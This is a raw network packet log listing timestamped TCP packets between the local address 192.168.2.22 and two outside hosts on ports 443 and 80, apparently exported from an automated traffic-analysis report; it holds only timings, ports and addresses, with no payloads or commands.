                                                                      Aug 28, 2024 06:53:54.323396921 CEST49164443192.168.2.2288.99.66.38
                                                                      Aug 28, 2024 06:53:54.368509054 CEST4434916488.99.66.38192.168.2.22
                                                                      Aug 28, 2024 06:53:54.614231110 CEST4434916488.99.66.38192.168.2.22
                                                                      Aug 28, 2024 06:53:54.614295959 CEST4434916488.99.66.38192.168.2.22
                                                                      Aug 28, 2024 06:53:54.614646912 CEST49164443192.168.2.2288.99.66.38
                                                                      Aug 28, 2024 06:53:54.616333008 CEST49164443192.168.2.2288.99.66.38
                                                                      Aug 28, 2024 06:53:54.616352081 CEST4434916488.99.66.38192.168.2.22
                                                                      Aug 28, 2024 06:53:54.616394997 CEST49164443192.168.2.2288.99.66.38
                                                                      Aug 28, 2024 06:53:54.616400957 CEST4434916488.99.66.38192.168.2.22
                                                                      Aug 28, 2024 06:53:55.954699993 CEST8049162107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:53:55.954787970 CEST4916280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:53:57.815800905 CEST49165443192.168.2.2288.99.66.38
                                                                      Aug 28, 2024 06:53:57.815834999 CEST4434916588.99.66.38192.168.2.22
                                                                      Aug 28, 2024 06:53:57.815901995 CEST49165443192.168.2.2288.99.66.38
                                                                      Aug 28, 2024 06:53:57.816539049 CEST49165443192.168.2.2288.99.66.38
                                                                      Aug 28, 2024 06:53:57.816555023 CEST4434916588.99.66.38192.168.2.22
                                                                      Aug 28, 2024 06:53:58.464678049 CEST4434916588.99.66.38192.168.2.22
                                                                      Aug 28, 2024 06:53:58.464745998 CEST49165443192.168.2.2288.99.66.38
                                                                      Aug 28, 2024 06:53:58.469429016 CEST49165443192.168.2.2288.99.66.38
                                                                      Aug 28, 2024 06:53:58.469441891 CEST4434916588.99.66.38192.168.2.22
                                                                      Aug 28, 2024 06:53:58.469727993 CEST4434916588.99.66.38192.168.2.22
                                                                      Aug 28, 2024 06:53:58.486761093 CEST49165443192.168.2.2288.99.66.38
                                                                      Aug 28, 2024 06:53:58.528510094 CEST4434916588.99.66.38192.168.2.22
                                                                      Aug 28, 2024 06:53:58.987782955 CEST4434916588.99.66.38192.168.2.22
                                                                      Aug 28, 2024 06:53:58.987865925 CEST4434916588.99.66.38192.168.2.22
                                                                      Aug 28, 2024 06:53:58.988049984 CEST49165443192.168.2.2288.99.66.38
                                                                      Aug 28, 2024 06:53:58.988435030 CEST49165443192.168.2.2288.99.66.38
                                                                      Aug 28, 2024 06:53:58.988451958 CEST4434916588.99.66.38192.168.2.22
                                                                      Aug 28, 2024 06:53:59.402870893 CEST49166443192.168.2.2288.99.66.38
                                                                      Aug 28, 2024 06:53:59.402904034 CEST4434916688.99.66.38192.168.2.22
                                                                      Aug 28, 2024 06:53:59.402983904 CEST49166443192.168.2.2288.99.66.38
                                                                      Aug 28, 2024 06:53:59.403256893 CEST49166443192.168.2.2288.99.66.38
                                                                      Aug 28, 2024 06:53:59.403273106 CEST4434916688.99.66.38192.168.2.22
                                                                      Aug 28, 2024 06:54:00.075897932 CEST4434916688.99.66.38192.168.2.22
                                                                      Aug 28, 2024 06:54:00.075998068 CEST49166443192.168.2.2288.99.66.38
                                                                      Aug 28, 2024 06:54:00.081130028 CEST49166443192.168.2.2288.99.66.38
                                                                      Aug 28, 2024 06:54:00.081151009 CEST4434916688.99.66.38192.168.2.22
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 28, 2024 06:54:00.081414938 CEST | 443 | 49166 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 06:54:00.085942984 CEST | 49166 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 06:54:00.132500887 CEST | 443 | 49166 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 06:54:00.370455027 CEST | 443 | 49166 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 06:54:00.370512962 CEST | 443 | 49166 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 06:54:00.370570898 CEST | 49166 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 06:54:00.371819973 CEST | 49166 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 06:54:00.371833086 CEST | 443 | 49166 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 06:54:00.397272110 CEST | 49167 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 06:54:00.397309065 CEST | 443 | 49167 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 06:54:00.397367001 CEST | 49167 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 06:54:00.397681952 CEST | 49167 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 06:54:00.397697926 CEST | 443 | 49167 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 06:54:01.049572945 CEST | 443 | 49167 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 06:54:01.050224066 CEST | 49167 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 06:54:01.050246954 CEST | 443 | 49167 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 06:54:01.050916910 CEST | 49167 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 06:54:01.050924063 CEST | 443 | 49167 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 06:54:01.341048956 CEST | 443 | 49167 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 06:54:01.341115952 CEST | 443 | 49167 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 06:54:01.341509104 CEST | 49167 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 06:54:01.341546059 CEST | 49167 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 06:54:01.428556919 CEST | 49168 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 06:54:01.428584099 CEST | 443 | 49168 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 06:54:01.428639889 CEST | 49168 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 06:54:01.429007053 CEST | 49168 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 06:54:01.429019928 CEST | 443 | 49168 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 06:54:02.087368965 CEST | 443 | 49168 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 06:54:02.087476015 CEST | 49168 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 06:54:02.088947058 CEST | 49168 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 06:54:02.088958025 CEST | 443 | 49168 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 06:54:02.090394974 CEST | 49168 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 06:54:02.090400934 CEST | 443 | 49168 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 06:54:02.387932062 CEST | 443 | 49168 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 06:54:02.388005018 CEST | 443 | 49168 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 06:54:02.388036013 CEST | 49168 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 06:54:02.388055086 CEST | 49168 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 06:54:02.388282061 CEST | 49168 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 06:54:02.388293028 CEST | 443 | 49168 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 06:54:02.388329029 CEST | 49168 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 06:54:02.388353109 CEST | 49168 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 06:54:02.390861988 CEST | 49169 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:02.395673037 CEST | 80 | 49169 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:02.395742893 CEST | 49169 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:02.395867109 CEST | 49169 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:02.400576115 CEST | 80 | 49169 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:02.971862078 CEST | 80 | 49169 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:02.971976042 CEST | 49169 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:03.551145077 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:03.555927038 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:03.555994987 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:03.556162119 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:03.560911894 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.164135933 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.164148092 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.164161921 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.164172888 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.164181948 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.164192915 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.164202929 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.164206982 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.164230108 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.164236069 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.164236069 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.164242029 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.164253950 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.164268017 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.164275885 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.164294958 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.164622068 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.164659977 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.168862104 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.170893908 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.170916080 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.170954943 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.170979977 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.171547890 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.171559095 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.171567917 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.171606064 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.171624899 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.172557116 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.172568083 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.172580004 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.172590971 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.172601938 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.172602892 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.172621965 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.172629118 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.172648907 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.173198938 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.173209906 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.173219919 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.173233986 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.173244953 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.173245907 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.173269033 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.173289061 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.173744917 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.173757076 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.173767090 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.173777103 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.173788071 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.173800945 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.173824072 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.178376913 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.178426981 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.178504944 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.178550005 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.179394007 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.179406881 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.179423094 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.179434061 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.179454088 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.179649115 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.179661036 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.179675102 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.179703951 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.179733992 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.182356119 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.182374001 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.182387114 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.182399988 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.182403088 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.182430983 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.182437897 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.182451963 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.182455063 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.182466030 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.182482958 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.182499886 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.182559013 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.182570934 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.182580948 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.182607889 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.182620049 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.183331013 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.183372974 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.183399916 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.183440924 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.183440924 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.183480024 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.183496952 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.183541059 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.184413910 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.184456110 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.184468985 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.184509039 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.184582949 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.184621096 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.184629917 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.184640884 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.184662104 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.184668064 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.184688091 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.184705973 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.185144901 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.185188055 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.185194969 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.185235023 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.185409069 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.185451984 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.185467958 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.185478926 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.185502052 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.185512066 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.185543060 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.187494040 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.187532902 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.187558889 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.187580109 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.187581062 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.187618017 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.187644005 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.187657118 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.187680960 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.187686920 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.187722921 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.188185930 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.188204050 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.188227892 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.188241005 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.188477993 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.188522100 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.188546896 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.188596964 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.188782930 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.188801050 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.188812971 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.188822031 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.188841105 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.188859940 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.188868999 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.188875914 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.188888073 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.188905954 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.188916922 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.189655066 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.189699888 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.189701080 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.189713001 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.189726114 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.189745903 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.189758062 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.190061092 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.190100908 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.190113068 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.190124035 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.190152884 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.190176010 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.190187931 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.190196991 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.190220118 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.190233946 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.190705061 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.190747976 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.190769911 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.190812111 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.190957069 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.190968037 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.190979004 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.191000938 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.191020966 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.191028118 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.191037893 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.191047907 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.191060066 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.191066980 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.191073895 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.191086054 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.191104889 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.209080935 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.213922977 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.213943958 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.213957071 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.213975906 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.213988066 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.214003086 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.214015007 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.214030981 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.214052916 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.214145899 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.214158058 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.214169025 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.214180946 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.214191914 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.214195967 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.214205027 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.214215994 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.214235067 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.214258909 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.214284897 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.214297056 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
Aug 28, 2024 06:54:05.214332104 CEST | 49170 | 80 | 192.168.2.22 | 107.172.31.21
Aug 28, 2024 06:54:05.214359045 CEST | 80 | 49170 | 107.172.31.21 | 192.168.2.22
